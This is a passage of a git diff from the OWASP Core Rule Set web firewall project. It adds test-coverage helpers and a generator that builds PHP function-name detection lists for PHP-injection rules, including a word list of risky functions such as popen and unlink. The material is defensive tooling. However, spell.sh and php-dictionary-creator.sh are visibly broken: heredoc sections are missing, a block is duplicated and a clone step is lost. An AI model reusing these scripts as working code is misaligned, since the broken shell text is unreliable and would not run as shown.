setvar:tx.crs_validate_utf8_encoding=1,\ + setvar:tx.arg_name_length=100,\ + setvar:tx.arg_length=400,\ + setvar:tx.combined_file_sizes=MAX_LEN" +``` + +In `modsecurity-crs-docker` [here](https://github.com/coreruleset/modsecurity-crs-docker/blob/master/src/opt/modsecurity/activate-rules.sh#L79-L82) is how the setting works. + +To configure the Github action, you need to set up this in CORERULESET/test/docker-compose.yaml: + +``` + ... + COMBINED_FILE_SIZES=MAX_LEN + ... +``` + +## Usage + +To find the possible value of MAX_LEN, run this script with one mandatory, and one optional argument. The mandatory argument is the path of the CRS directory (the root). The optional argument is the `-i` or `--ignoretests`, where you can pass the test id what you want to skip - eg. you want to use the test to exceed the maximum length. + +``` +./find_max_datalen.py ../.. -i 920410-1 +``` + +In this case, you pass the CRS root as parent dir, and skip the test id 920410-1, which wants to exceed the maximum length. + +## Prerequisites + +* Python3 interpreter +* Py-YAML +* CRS rule set diff --git a/util/find-max-datalen-in-tests/find_max_datalen.py b/util/find-max-datalen-in-tests/find_max_datalen.py new file mode 100755 index 0000000000..aab66ac76d --- /dev/null +++ b/util/find-max-datalen-in-tests/find_max_datalen.py @@ -0,0 +1,69 @@ +#!/usr/bin/env python3 + +# This file helps to find the longest data size in all test cases under +# CORERULESET_ROOT/test/regression/tests directory. + +# You just have to pass the CORERULESET_ROOT as argument. +# Optional argument can be passed -i or --ignoretests - the listed test +# cases will skipped. + +# At the end, the script will print the longest length, and the rule where +# the data is. + + +import sys +import os +import os.path +import yaml +import argparse + +if __name__ == "__main__": + + desc = """This script needs a mandatory argument where you pass the path to your +coreruleset. Then it iterates through tests, and finds the longest request +body (data) between test cases. To ignore a test case, pass the number of the +test with '-i' or '--ignoretests', eg.: '... -i 920410-1'""" + + parser = argparse.ArgumentParser(description=desc, formatter_class=argparse.RawTextHelpFormatter) + parser.add_argument('-i', '--ignoretests', metavar='ignoretests', + help='Ignore listed rules, separated by comma', required=False, + nargs=1) + parser.add_argument('crspath', metavar='/path/to/coreruleset', type=str, + help='Directory path to CRS') + args = parser.parse_args() + + test_cases = {} + testpath = args.crspath.rstrip("/") + "/tests/regression/tests" + + if not os.path.isdir(testpath): + print("Directory does not exist: %s" % (testpath)) + sys.exit(1) + + ignoretests = [] + if args.ignoretests is not None: + ignoretests = args.ignoretests[0].split(",") + + try: + max_len = 0 + max_title = "" + for root, dirs, files in os.walk(testpath): + path = root.split(os.sep) + for file in files: + if file.endswith(".yaml"): + with open(os.path.join(root, file)) as f: + test = yaml.full_load(f) + for t in test['tests']: + title = t['test_title'] + for s in t['stages']: + if 'stage' in s: + if 'input' in s['stage']: + if 'data' in s['stage']['input']: + if len(s['stage']['input']['data']) > max_len \ + and title not in ignoretests: + max_len = len(s['stage']['input']['data']) + max_title = title + print("Longest data: %d in test %s" % (max_len, max_title)) + except: + print("Can't open files in given path!") + print(sys.exc_info()) + sys.exit(1) diff --git a/util/find-rules-without-test/README.md b/util/find-rules-without-test/README.md new file mode 100644 index 0000000000..faf8ed3054 --- /dev/null +++ b/util/find-rules-without-test/README.md @@ -0,0 +1,36 @@ +# Find the rules without test cases + +This page describes how can you find the rules without any test cases + +## Goal + +The main goal is that we must have at least one regression test for all relevant REQUEST- * rules. (In this context, the PL control rules are not relevant, because they do not need to have tests.) + +You need to pass the CORERULESET_ROOT as argument, eg: +``` +util/find-rules-without-test/find-rules-without-test.py /path/to/coreruleset +``` + +Optionally you can pass the argument `--output=github` or `--output=native`. The last one is the default. + +The script collects all available test files, based on the name of the test files. It will look up under CORERULESET_ROOT/tests/regression/tests/*. + +Then it starts to read all rule files with name "REQUEST-\*", which means this won't handle the RESPONSE-* rules. + +The script parses the rules, uses `msc_pyparser`, reads the rule's id, and tries to find the test case. + +The sctipt ignores the check in case of PL control rules (rules with id under 9XX100), and some hardcoded rules: + * REQUEST-900- + * REQUEST-901- + * REQUEST-905- + * REQUEST-910- + * REQUEST-912. + * REQUEST-949- + + +## Prerequisites + +* Python3 interpreter +* Py-YAML +* msc_pyparser +* CRS rule set diff --git a/util/find-rules-without-test/find-rules-without-test.py b/util/find-rules-without-test/find-rules-without-test.py new file mode 100755 index 0000000000..5ee9c00ec4 --- /dev/null +++ b/util/find-rules-without-test/find-rules-without-test.py @@ -0,0 +1,137 @@ +#!/usr/bin/env python3 + +# This file helps to find the rules which does not have any test cases. +# +# You just have to pass the CORERULESET_ROOT as argument. +# +# At the end, the script will print the list of rules without any tests. +# +# Please note, that there are some exclusions: +# * only REQUEST-NNN rules are checked +# * there are some hardcoded exlucions: +# * REQUEST-900- +# * REQUEST-901- +# * REQUEST-905- +# * REQUEST-910- +# * REQUEST-912. +# * REQUEST-949- +# +# and the rule 921170 + +import sys +import glob +import msc_pyparser +import argparse + +EXCLUSION_LIST = ["900", "901", "905", "910", "912", "949", "921170", "942441", "942442"] +oformat = "native" + +def find_ids(s, test_cases): + """ + s: the parsed structure + test_cases: all available test cases + """ + rids = {} + for i in s: + # only SecRule counts + if i['type'] == "SecRule": + for a in i['actions']: + # find the `id` action + if a['act_name'] == "id": + # get the argument of the action + rid = int(a['act_arg']) # int + srid = a['act_arg'] # string + if (rid%1000) >= 100: # skip the PL control rules + # also skip these hardcoded rules + need_check = True + for excl in EXCLUSION_LIST: + if srid[:len(excl)] == excl: + need_check = False + if need_check: + # if there is no test cases, just print it + if rid not in test_cases: + rids[rid] = a['lineno'] + return rids + +def errmsgf(msg): + if oformat == "github": + print("::error file={file},line={line},endLine={endLine},title={title}::{message}".format(**msg)) + else: + print("file={file}, line={line}, endLine={endLine}, title={title}: {message}".format(**msg)) + +if __name__ == "__main__": + + desc = """This script helps to find the rules without test cases. It needs a mandatory +argument where you pass the path to your coreruleset. The tool collects the +tests with name REQUEST-*, but not with RESPONSE-*. Then reads the rule id's, +and check which rule does not have any test. Some rules does not need test +case, these are hardcoded as exclusions: 900NNN, 901NNN, 905NNN, 910NNN, +912NNN, 949NNN.""" + + parser = argparse.ArgumentParser(description=desc, formatter_class=argparse.RawTextHelpFormatter) + parser.add_argument("--output", dest="output", help="Output format native[default]|github", required=False) + parser.add_argument('crspath', metavar='/path/to/coreruleset', type=str, + help='Directory path to CRS') + args = parser.parse_args() + + if args.output is not None: + if args.output not in ["native", "github"]: + print("--output can be one of the 'native' or 'github'. Default value is 'native'") + sys.exit(1) + oformat = args.output + + test_cases = {} + # from argument, build the rules path and regression test paths + crspath = args.crspath.rstrip("/") + "/rules/*.conf" + testpath = args.crspath.rstrip("/") + "/tests/regression/tests/*" + retval = 0 + # collect rules + flist = glob.glob(crspath) + flist.sort() + if len(flist) == 0: + print("Can't open files in given path!") + sys.exit(1) + + # collect test cases + tlist = glob.glob(testpath) + tlist.sort() + if len(tlist) == 0: + print("Can't open files in given path (%s)!" % (testpath)) + sys.exit(1) + # find the yaml files with name REQUEST at the begin + # collect them in a dictionary + for t in tlist: + tname = t.split("/")[-1] + if tname[:7] == "REQUEST": + testlist = glob.glob(t + "/*.yaml") + testlist.sort() + for tc in testlist: + tcname = tc.split("/")[-1].split(".")[0] + test_cases[int(tcname)] = 1 + + # iterate the rule files + for f in flist: + fname = f.split("/")[-1] + if fname[:7] == "REQUEST": + try: + with open(f, 'r') as inputfile: + data = inputfile.read() + except: + print("Can't open file: %s" % f) + print(sys.exc_info()) + sys.exit(1) + + try: + # make a structure + mparser = msc_pyparser.MSCParser() + mparser.parser.parse(data) + # add the parsed structure to a function, which finds the 'id'-s, + # and the collected test cases + rids = find_ids(mparser.configlines, test_cases) + for k in rids.keys(): + errmsgf({'file': f, 'line': rids[k], 'endLine': rids[k], 'title': "Test file missing", 'message': ("rule %d does not have any regression test" % k)}) + except: + print("Can't parse config file: %s" % (f)) + print(sys.exc_info()[1]) + sys.exit(1) + sys.exit(retval) diff --git a/util/find-rules-without-test/requirements.txt b/util/find-rules-without-test/requirements.txt new file mode 100644 index 0000000000..a989487670 --- /dev/null +++ b/util/find-rules-without-test/requirements.txt @@ -0,0 +1 @@ +msc-pyparser>=1.2.1 diff --git a/util/fp-finder/english-extended.txt b/util/fp-finder/english-extended.txt new file mode 100644 index 0000000000..8a3c41b4a4 --- /dev/null +++ b/util/fp-finder/english-extended.txt @@ -0,0 +1,31 @@ +basename +checkdate +chroot +config +crypto +dir +exp +file_exists +fileatime +filectime +filegroup +fileinode +filemtime +fileowner +fileperms +filesize +filetype +idate +is_a +md5 +misc +ord +popen +prev +stat +substr +symlink +syslog +ucfirst +unlink +unset diff --git a/util/fp-finder/spell.sh b/util/fp-finder/spell.sh new file mode 100755 index 0000000000..2e5dde3d0a --- /dev/null +++ b/util/fp-finder/spell.sh @@ -0,0 +1,163 @@ +#!/bin/bash + +# This program uses WordNet to find English words. The WordNet license: + +# WordNet Release 3.0 This software and database is being provided to you, +# the LICENSEE, by Princeton University under the following license. +# By obtaining, using and/or copying this software and database, you agree that you have read, +# understood, and will comply with these terms and conditions.: Permission to use, copy, +# modify and distribute this software and database and its documentation for any purpose and +# without fee or royalty is hereby granted, provided that you agree to comply with +# the following copyright notice and statements, including the disclaimer, and that the same +# appear on ALL copies of the software, database and documentation, including modifications +# that you make for internal use or for distribution. +# WordNet 3.0 Copyright 2006 by Princeton University. +# All rights reserved. +# THIS SOFTWARE AND DATABASE IS PROVIDED "AS IS" AND PRINCETON UNIVERSITY MAKES NO REPRESENTATIONS +# OR WARRANTIES, EXPRESS OR IMPLIED. BY WAY OF EXAMPLE, BUT NOT LIMITATION, PRINCETON UNIVERSITY +# MAKES NO REPRESENTATIONS OR WARRANTIES OF MERCHANT- ABILITY OR FITNESS FOR ANY PARTICULAR PURPOSE +# OR THAT THE USE OF THE LICENSED SOFTWARE, DATABASE OR DOCUMENTATION WILL NOT INFRINGE ANY THIRD +# PARTY PATENTS, COPYRIGHTS, TRADEMARKS OR OTHER RIGHTS. +# The name of Princeton University or Princeton may not be used in advertising or publicity +# pertaining to distribution of the software and/or database. Title to copyright in this +# software, database and any associated documentation shall at all times remain with +# Princeton University and LICENSEE agrees to preserve same. + +if ! command -v wn > /dev/null 2>&1; then + cat < checking ${datafile_name}" + fi + + local datafile="${1}" + local datafile_name + + if [ "${1}" = "-" ]; then + datafile="/dev/stdin" + datafile_name="stdin" + else + datafile_name="${datafile##*/}" + fi + + local datafile="${1}" + local datafile_name + + if [ "${1}" = "-" ]; then + datafile="/dev/stdin" + datafile_name="stdin" + else + datafile_name="${datafile##*/}" + fi + + while read -r word; do + # wordnet exit code is equal to number of search results + if [ -n "${SUFFIX}" ]; then + word="$(sed -E "s/(.*)${SUFFIX}/\1/" <<<"${word}")" + fi + if ! grep -qE '^[A-Za-z]+$' <<<"${word}"; then + continue + fi + + if ! wn "${word}" >/dev/null 2>&1; then + if ! ${MACHINE_READABLE}; then + printf " \`- found English word via wn: " + fi + echo "${word}" + else + if ${USE_EXTENDED}; then + # shellcheck disable=SC2046 + if [ $(grep -c -E "^$word$" "$EXTENDED_WORDS_LIST_PATH") -ne 0 ]; then + if ! ${MACHINE_READABLE}; then + printf " \`- found English word via extended list: " + fi + echo "${word}" + fi + fi + fi + done <<<"$(sort "${datafile}" | uniq)" + + if ! ${MACHINE_READABLE}; then + echo "" + fi +} + +usage() { + cat < /dev/null && pwd ) +EXTENDED_WORDS_LIST_PATH="${SCRIPT_DIR}/english-extended.txt" +RULES_DIR="${SCRIPT_DIR}/../../rules/" + +MACHINE_READABLE=false +USE_EXTENDED=false + +POSITIONAL_ARGS=() +while [[ $# -gt 0 ]]; do + # shellcheck disable=SC2221,SC2222 + case $1 in + -m|--machine) + MACHINE_READABLE=true + shift + ;; + -e|--extended) + USE_EXTENDED=true + shift + ;; + -s|--suffix) + shift + SUFFIX="${1}" + shift + ;; + -h|--help) + usage + exit 1 + ;; + -*|--*) + if [ $# -eq 1 ]; then + POSITIONAL_ARGS+=("$1") # save positional arg + shift # past argument + else + echo "Unknown option $1" + usage + exit 1 + fi + ;; + *) + POSITIONAL_ARGS+=("$1") # save positional arg + shift + ;; + esac +done + +set -- "${POSITIONAL_ARGS[@]}" # restore positional parameters + + +if [ -n "${1}" ]; then + check "${1}" +else + for datafile in "${RULES_DIR}"*.data; do + check "${datafile}" + done +fi diff --git a/util/join-multiline-rules/join.py b/util/join-multiline-rules/join.py index 95c96c2b17..7a2fc4ce07 100755 --- a/util/join-multiline-rules/join.py +++ b/util/join-multiline-rules/join.py @@ -20,16 +20,16 @@ # # Example: # -# SecRule &TX:paranoia_level "@eq 0" \ +# SecRule &TX:BLOCKING_PARANOIA_LEVEL "@eq 0" \ # "id:901120,\ # phase:1,\ # pass,\ # nolog,\ -# setvar:tx.paranoia_level=1" +# setvar:tx.blocking_paranoia_level=1" # # will be outputted as: # -# SecRule &TX:paranoia_level "@eq 0" "id:901120,phase:1,pass,nolog,setvar:tx.paranoia_level=1" +# SecRule &TX:BLOCKING_PARANOIA_LEVEL "@eq 0" "id:901120,phase:1,pass,nolog,setvar:tx.blocking_paranoia_level=1" # import fileinput, sys diff --git a/util/php-dictionary-gen/php-dictionary-creator.sh b/util/php-dictionary-gen/php-dictionary-creator.sh new file mode 100755 index 0000000000..dcb0c55e75 --- /dev/null +++ b/util/php-dictionary-gen/php-dictionary-creator.sh @@ -0,0 +1,501 @@ +#!/bin/bash +# +# This is a utility script to create wordlists for later use by the +# OWASP ModSecurity Core Rule Set. +# +# The scripts extracts function names out of the PHP source code and +# filters them into different categories. +# + +IFS=$'\n\t' + +# -------------------------------------------------- +# Initialization +# -------------------------------------------------- + +VERBOSE=0 +ERROR=0 + +MYDATE=$(date +"%Y-%m-%d") +MYDATE_SECONDS=$(date +"%s") + +AGE_LIMIT=30 +FREQUENCY_LIMIT=90000 + +RULES="933150 933151 933161" +RULES_CMDLINE="" + +PHP_REPO="" +PHP_REPO_CMDLINE="" +PHP_REPO_GITHUB="https://github.com/php/php-src" + +SPELL_PATH="../fp-finder/spell.sh" +SPELL_PATH_CMDLINE="" + + +DEFAULT_PHP_FUNCTIONS_FREQUENCIES="./frequencylist.txt" +TMP_PHP_FUNCTIONS_FREQUENCIES_ERRORS=$(mktemp) +PHP_FUNCTIONS_FREQUENCIES_CMDLINE="" + +TMP_PHP_FUNCTIONS=$(mktemp) +TMP_ENGLISH_WORDS=$(mktemp) +TMP_PHP_FUNCTIONS_FREQUENT=$(mktemp) +TMP_PHP_FUNCTIONS_RARE=$(mktemp) +TMPDIR=$(mktemp -d) + +trap 'rm -rf $TMP_PHP_FUNCTIONS $TMP_PHP_FUNCTIONS_FREQUENT $TMP_PHP_FUNCTIONS_RARE $TMP_ENGLISH_WORDS $TMPDIR' INT TERM EXIT + +HIGH_RISK_FUNCTIONS_FILENAME="php-high-risk-functions.txt" + +R933160_FILENAME="933160.ra" +R933161_FILENAME="933161.ra" + +read -r -d '' TOOLCHAIN_PREFIX << 'EOF' +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. +EOF + +read -r -d '' R933161_PREFIX << 'EOF' +##!+ i +##!^ \b +##!$ (?:\s|/\*.*\*/|#.*|//.*)*\(.*\) +EOF + +PHP_DICTIONARY_GEN_PREFIX="##! File autogenerated by util/php-dictionary-gen with:" + +R933150_FILENAME="php-function-names-933150.data" +R933151_FILENAME="php-function-names-933151.data" + +DATA_FILE_PATH="../../rules/" +RA_FILE_PATH="../../regex-assembly/" + +# -------------------------------------------------- +# Library Functions +# -------------------------------------------------- + +function usage { + + cat << EOF + +This is a utility script to create wordlists for later use by the +OWASP ModSecurity Core Rule Set. + +Usage: + +$> $(basename "$0") [options] + +Options: + + -a --agelimit STR Age in days before frequency is retrieved anew from github + Only makes sense when used together with frequencylist + Default: $AGE_LIMIT + -h --help Print help text and exit. + -f --frequencylist STR File with frequencies of PHP function usage on github + Default: $DEFAULT_PHP_FUNCTIONS_FREQUENCIES + -F --frequencylimit STR Minimum number of occurrences in GitHub repo to qualify for base rule + Functions not meeting this limit will be added to stricter sibling + Default: $FREQUENCY_LIMIT + -p --phprepo STR Path to PHP repository. Optional. + -r --rules STR Space separated list of rules to cover. + Rules available: + * 933150 + * 933151 + * 933161 + Default: "$RULES" + -s --spell STR Path of spell.sh script. + Default: $SPELL_PATH + -v --verbose Verbose output + + +Filter Architecture +------------------- +See discussion at +https://github.com/coreruleset/coreruleset/pull/3228#issuecomment-1594813466 + +Input: Function list out of PHP source code + +Filter 1: Is the function name an English word? +If yes: Add to source for rule 933161 +If no: Continue +Filter 2: Is the function name frequently used on GitHub (across all PHP repos)? +If yes: Add to word list for 933150 +If no: Add to word list for 933151 + +Please note that rules 933150 and 933151 are parallel match rules. So the +output of this script is the parallel match file for these rules. + +Rule 933161 is a regular expression rule, though, so the output of this +script is the source file for the CRS toolchain. + +EOF + + exit 0 +} + +function break_on_error { + if [ "$1" -ne 0 ]; then + echo + if [ -n "$2" ]; then + echo -e "$2" + fi + echo "FAILED. This is fatal. Aborting" + exit 1 + fi +} + + +function get_frequency { + NUM="" + N=0 + + until [ -n "$NUM" ] || [ $N -gt 4 ]; do + N=$((N + 1)) + + CURL_OUTPUT=$(curl -v \ + --header "X-GitHub-Api-Version: 2022-11-28" \ + --header "Accept: application/vnd.github+json" \ + --header "Authorization: Bearer $GITHUB_TOKEN" \ + "https://api.github.com/search/code?q=$1+language:php&type=Code&per_page=1" 2>&1) + + NUM=$(echo "$CURL_OUTPUT" | grep "total_count" | grep -o -E "[0-9]*") + + if [ -z "$NUM" ]; then + >&2 echo -n " Curl call for $1 failed." + if [ "$(echo "$CURL_OUTPUT" | grep -c "x-ratelimit-remaining: 0")" -eq 1 ]; then + >&2 echo -n " Hitted rate limit. Waiting..." + # 50 is the number of seconds to wait for the rate limit to be reset to 10 + # /search/code endpoint is limited to 10 requests per minute. + # See https://docs.github.com/en/rest/search/search?apiVersion=2022-11-28#search-code + sleep 25 + fi + >&2 echo " Trying again ($N)." + fi + + sleep 1 + done + if [ -z "$NUM" ]; then + echo "- $1" >> "$TMP_PHP_FUNCTIONS_FREQUENCIES_ERRORS" + fi + echo "$NUM" +} + + +function vprint { + + if [ $VERBOSE -eq 1 ]; then + echo -e "$1" + fi +} + +# -------------------------------------------------- +# Parameter reading and checking +# -------------------------------------------------- + +while true +do + if [ -n "${1-}" ]; then + ARG="${1-}" + FIRSTCHAR="$(echo "$ARG " | cut -b1)" + # The space after $ARG makes sure CLI option "-e" (an echo option) is also accepted + if [ "$FIRSTCHAR" == "-" ]; then + case $1 in + -h) usage; exit;; + --help) usage; exit;; + -a) export AGE_LIMIT_CMDLINE="${2-}"; shift;; + --agelimit) export AGE_LIMIT_CMDLINE="${2-}"; shift;; + -f) export PHP_FUNCTIONS_FREQUENCIES_CMDLINE="${2-}"; shift;; + --frequencylist) export PHP_FUNCTIONS_FREQUENCIES_CMDLINE="${2-}"; shift;; + -F) export FREQUENCY_LIMIT_CMDLINE="${2-}"; shift;; + --frequencylimit) export FREQUENCY_LIMIT_CMDLINE="${2-}"; shift;; + -p) export PHP_REPO_CMDLINE="${2-}"; shift;; + --phprepo) export PHP_REPO_CMDLINE="${2-}"; shift;; + -r) export RULES_CMDLINE="${2-}"; shift;; + --rules) export RULES_CMDLINE="${2-}"; shift;; + -s) export SPELL_PATH_CMDLINE="${2-}"; shift;; + --spell) export SPELL_PATH_CMDLINE="${2-}"; shift;; + -v) export VERBOSE=1;; + --verbose) export VERBOSE=1;; + *) echo "Unknown option $1. This is fatal. Aborting."; exit 1;; + esac + if [ -n "${1-}" ]; then + shift + fi + else + break + fi + else + break + fi +done + +if [ -n "$PHP_FUNCTIONS_FREQUENCIES_CMDLINE" ]; then + if [ ! -f "$PHP_FUNCTIONS_FREQUENCIES_CMDLINE" ]; then + echo "$PHP_FUNCTIONS_FREQUENCIES_CMDLINE is not existing. This is fatal. Aborting." + exit 1 + else + PHP_FUNCTIONS_FREQUENCIES=$PHP_FUNCTIONS_FREQUENCIES_CMDLINE + echo "Setting custom frequency list file: $PHP_FUNCTIONS_FREQUENCIES." + fi +else + PHP_FUNCTIONS_FREQUENCIES=$DEFAULT_PHP_FUNCTIONS_FREQUENCIES + echo "Setting default frequency list file: $PHP_FUNCTIONS_FREQUENCIES." +fi + + +if [ -n "$PHP_REPO_CMDLINE" ]; then + if [ -d "$PHP_REPO_CMDLINE" ]; then + PHP_REPO="$PHP_REPO_CMDLINE" + else + echo "Path to PHP repository passed on command line is not existing. This is fatal. Aborting." + exit 1 + fi +fi + +if [ -n "$AGE_LIMIT_CMDLINE" ]; then + AGE_LIMIT="$AGE_LIMIT_CMDLINE" +fi + +if [ -n "$FREQUENCY_LIMIT_CMDLINE" ]; then + FREQUENCY_LIMIT="$FREQUENCY_LIMIT_CMDLINE" +fi + +# Adding parameters used by this run to the prefix that will be printed on the generated files. +PHP_DICTIONARY_GEN_PREFIX="$PHP_DICTIONARY_GEN_PREFIX -a $AGE_LIMIT -F $FREQUENCY_LIMIT -s $SPELL_PATH" + +if [ -n "$RULES_CMDLINE" ]; then + # Making sure the rules given on the cmd line can be accomodated for. + echo "$RULES_CMDLINE" | tr " " "\n" | while read -r RULE; do + echo "$RULE" | grep -E -q "^(933150|933151|933161)$" + if [ $? -ne 0 ]; then + echo "Rule $RULE is not available. This is fatal. Aborting." + exit + fi + done +fi + +if [ -n "$SPELL_PATH_CMDLINE" ]; then + if [ ! -x "$SPELL_PATH_CMDLINE" ]; then + echo "$SPELL_PATH_CMDLINE is not existing or is not executable. This is fatal. Aborting." + exit 1 + else + SPELL_PATH=$SPELL_PATH_CMDLINE + fi +fi + +# check if WordNet (wn) is installed +# We could also defer this test to spell.sh. But if done ourselves, we can +# control the error message and behavior. +if [ "$(command -v wn > /dev/null 2>&1 )" ]; then + cat </dev/null 2>&1 + ERROR=$(($ERROR|$?)) # logical OR + break_on_error $ERROR + echo "done" + PHP_REPO="$TMPDIR" +else + echo -n "Updating PHP repo ... " + PWD_SAVE=$(pwd) + cd $PHP_REPO || break_on_error 1 "Cannot cd to $PHP_REPO" + git checkout master >/dev/null 2>&1 + git pull --depth 1 >/dev/null 2>&1 + ERROR=$(($ERROR|$?)) # logical OR + break_on_error $ERROR + echo "done" + cd "$PWD_SAVE" || break_on_error 1 "Cannot cd back to $PWD_SAVE" +fi + +# Step 2 - Extract Function Names +echo -n "Extracting PHP function names ... " +# Strings containing "$" are excluded (E.g. "{$this->getDeclarationName") +grep -o --no-file -R 'ZEND_FUNCTION(.*)' "$PHP_REPO" | grep -v '\$' | cut -f2 -d\( | cut -f1 -d\) | sort | uniq > $TMP_PHP_FUNCTIONS +ERROR=$(($ERROR|$?)) # logical OR +break_on_error $ERROR +echo "done ($(wc -l "$TMP_PHP_FUNCTIONS" | xargs echo | cut -d\ -f1 ) function names found)" + +# Step 3 - Filter 1: Is it an English word +echo -n "Extracting English words out of list of PHP function names ... " +$SPELL_PATH --machine --extended "$TMP_PHP_FUNCTIONS" > "$TMP_ENGLISH_WORDS" +ERROR=$(($ERROR|$?)) # logical OR +break_on_error $ERROR "$(cat "$TMP_ENGLISH_WORDS")" +echo "done ($(wc -l "$TMP_ENGLISH_WORDS" | xargs echo | cut -d\ -f1 ) english words found)" +# Step 4 - Output 933161 +if [ "$DO_RULE_933161" == "1" ]; then + # Being 933161 a stricter sibling of 933160, 933160 entries are also added to 933161. + # We read the 933160 file skipping comments and empty lines. Entries are added to 933161 (if not already present). + grep -v '^#' "$RA_FILE_PATH$R933160_FILENAME" | awk NF | while read -r R933160_ENTRY; do + + if [ $(grep -c -E "^$R933160_ENTRY$" "$TMP_ENGLISH_WORDS") -eq 0 ]; then + # we have to add this function to 933161 + echo "Function \"$R933160_ENTRY\" from $R933160_FILENAME added to the stricter sibling $R933161_FILENAME" + echo "$R933160_ENTRY" >> "$TMP_ENGLISH_WORDS" + else + echo "Function \"$R933160_ENTRY\" from $R933160_FILENAME already present in the stricter sibling $R933161_FILENAME" + fi + + done + + sort -o "$TMP_ENGLISH_WORDS" "$TMP_ENGLISH_WORDS" + echo -n "Writing output for rule 933161 to $R933161_FILENAME ... " + echo "$TOOLCHAIN_PREFIX" > $RA_FILE_PATH$R933161_FILENAME + echo -e "\n$PHP_DICTIONARY_GEN_PREFIX\n" >> $RA_FILE_PATH$R933161_FILENAME + echo "$R933161_PREFIX" >> $RA_FILE_PATH$R933161_FILENAME + # new line print is in a separate echo to avoid echoing the prefix without enabling interpretation of backslash escapes + echo -e -n "\n" >> $RA_FILE_PATH$R933161_FILENAME + cat "$TMP_ENGLISH_WORDS" >> $RA_FILE_PATH$R933161_FILENAME + echo "done" +fi + +# Step 5 - Create or update frequency list +echo "Creating / updating frequency list for functions (namely creating may take a while) ..." +sed -i -e "s/^/^/" -e "s/$/$/" "$TMP_ENGLISH_WORDS" +cat "$TMP_PHP_FUNCTIONS" | grep -v -E -f "$TMP_ENGLISH_WORDS" | while read -r FUNCTION; do + + grep -q -E "^$FUNCTION " "$PHP_FUNCTIONS_FREQUENCIES" + if [ $? -ne 0 ]; then + # function name not found in frequency list + echo "Function $FUNCTION not found in frequency file. Attempting to add." + NUM=$(get_frequency "$FUNCTION") + if [ -z "$NUM" ]; then + echo " Retrieving frequency failed. Cannot add item." + else + echo " Adding entry for function $FUNCTION with frequency $NUM" + echo "$FUNCTION $NUM $MYDATE" >> "$PHP_FUNCTIONS_FREQUENCIES" + sort -o "$PHP_FUNCTIONS_FREQUENCIES" "$PHP_FUNCTIONS_FREQUENCIES" + fi + else + # function name found in frequency list + TIMESTAMP=$(grep -E "^$FUNCTION " "$PHP_FUNCTIONS_FREQUENCIES" | cut -d\ -f3) + TIMESTAMP_SECONDS=$(date -d "$TIMESTAMP" +%s 2>&1) # For MacOS users: gdate is needed instead of date + ERROR=$(($ERROR|$?)) # logical OR + break_on_error $ERROR "$TIMESTAMP_SECONDS\nError. Check that date is the GNU date binary from coreutils." + DIFF_SECONDS=$((MYDATE_SECONDS - TIMESTAMP_SECONDS)) + DIFF_DAYS=$(($DIFF_SECONDS / 86400)) + NUM=$(grep -E "^$FUNCTION " "$PHP_FUNCTIONS_FREQUENCIES" | cut -d\ -f2) + vprint "Function $FUNCTION exists (timestamp: $TIMESTAMP, age: $DIFF_DAYS, frequency: $NUM)" + if [ $DIFF_DAYS -gt "$AGE_LIMIT" ]; then + NUM=$(get_frequency "$FUNCTION") + if [ -z "$NUM" ]; then + echo "Entry for function $FUNCTION is too old. Updating failed. Removing record." + sed -i -e "/^$FUNCTION /d" "$PHP_FUNCTIONS_FREQUENCIES" + else + echo "Entry for function $FUNCTION is too old. Updating with new data (new frequency: $NUM)." + sed -i -e "s/^$FUNCTION .*/$FUNCTION $NUM $MYDATE/" "$PHP_FUNCTIONS_FREQUENCIES" + fi + + fi + fi + +done +echo "Done creating / updating frequency list." + +# Step 6 - Filter 2: Output depending on frequency +echo "Starting filtering PHP functions names with frequency limit: $FREQUENCY_LIMIT..." +cat "$PHP_FUNCTIONS_FREQUENCIES" | cut -d\ -f1 | while read -r FUNCTION; do + NUM=$(grep -E "^$FUNCTION " "$PHP_FUNCTIONS_FREQUENCIES" | cut -d\ -f2) + if [ -n "$NUM" ] && [ "$NUM" -gt "$FREQUENCY_LIMIT" ]; then + if [ "$DO_RULE_933150" == "1" ]; then + echo "Function \"$FUNCTION\" (frequency $NUM) added to $R933150_FILENAME" + echo "$FUNCTION" >> "$TMP_PHP_FUNCTIONS_FREQUENT" + fi + else + if [ "$DO_RULE_933151" == "1" ]; then + echo "Function \"$FUNCTION\" (frequency $NUM) added to $R933151_FILENAME" + echo "$FUNCTION" >> "$TMP_PHP_FUNCTIONS_RARE" + fi + fi +done + +echo "Done filtering PHP functions names." +if [ -s "$TMP_PHP_FUNCTIONS_FREQUENCIES_ERRORS" ]; then + FAILED_COUNTER=$(echo "$PHP_FUNCTIONS_FREQUENCIES_ERRORS" | wc -l | xargs echo) + echo -n "Failed to retrieve frequency for $FAILED_COUNTER function(s)" + if [ $VERBOSE -eq 1 ]; then + echo ":" + cat "$TMP_PHP_FUNCTIONS_FREQUENCIES_ERRORS" + else + echo "." + fi +fi + +if [ "$DO_RULE_933150" == "1" ]; then + # 933150 comes with a second source of non english words high-risk php functions. + # Any occurrence that is part of that list and not already in 933150 is now added. + cat "$HIGH_RISK_FUNCTIONS_FILENAME" | while read -r HIGH_RISK_FUNC; do + if [ $(grep -c -E "^$HIGH_RISK_FUNC$" "$TMP_PHP_FUNCTIONS_FREQUENT") -eq 0 ]; then + # we have to add this function to 933150 + echo "High-risk function \"$HIGH_RISK_FUNC\" added to $R933150_FILENAME" + echo "$HIGH_RISK_FUNC" >> "$TMP_PHP_FUNCTIONS_FREQUENT" + else + echo "High-risk function \"$HIGH_RISK_FUNC\" already present in $R933150_FILENAME" + fi + + done + sort -o "$TMP_PHP_FUNCTIONS_FREQUENT" "$TMP_PHP_FUNCTIONS_FREQUENT" + echo "File $R933150_FILENAME updated." + echo "$PHP_DICTIONARY_GEN_PREFIX" > $DATA_FILE_PATH$R933150_FILENAME + cat "$TMP_PHP_FUNCTIONS_FREQUENT" >> $DATA_FILE_PATH$R933150_FILENAME +fi +if [ "$DO_RULE_933151" == "1" ]; then + echo "File $R933151_FILENAME updated." + echo "$PHP_DICTIONARY_GEN_PREFIX" > $DATA_FILE_PATH$R933151_FILENAME + cat "$TMP_PHP_FUNCTIONS_RARE" >> $DATA_FILE_PATH$R933151_FILENAME +fi + +if [ "$DO_RULE_933161" == "1" ]; then + echo '933161.ra file updated, mind to run "crs-toolchain regex update --all" before committing changes' +fi + +TIME_END=$(date +"%s") +echo "The script took $((TIME_END-MYDATE_SECONDS)) seconds to complete." + + +# -------------------------------------------------- +# Cleanup +# -------------------------------------------------- + +# Temp files are cleaned via trap set above. diff --git a/util/regexp-assemble/regexp-933160.data 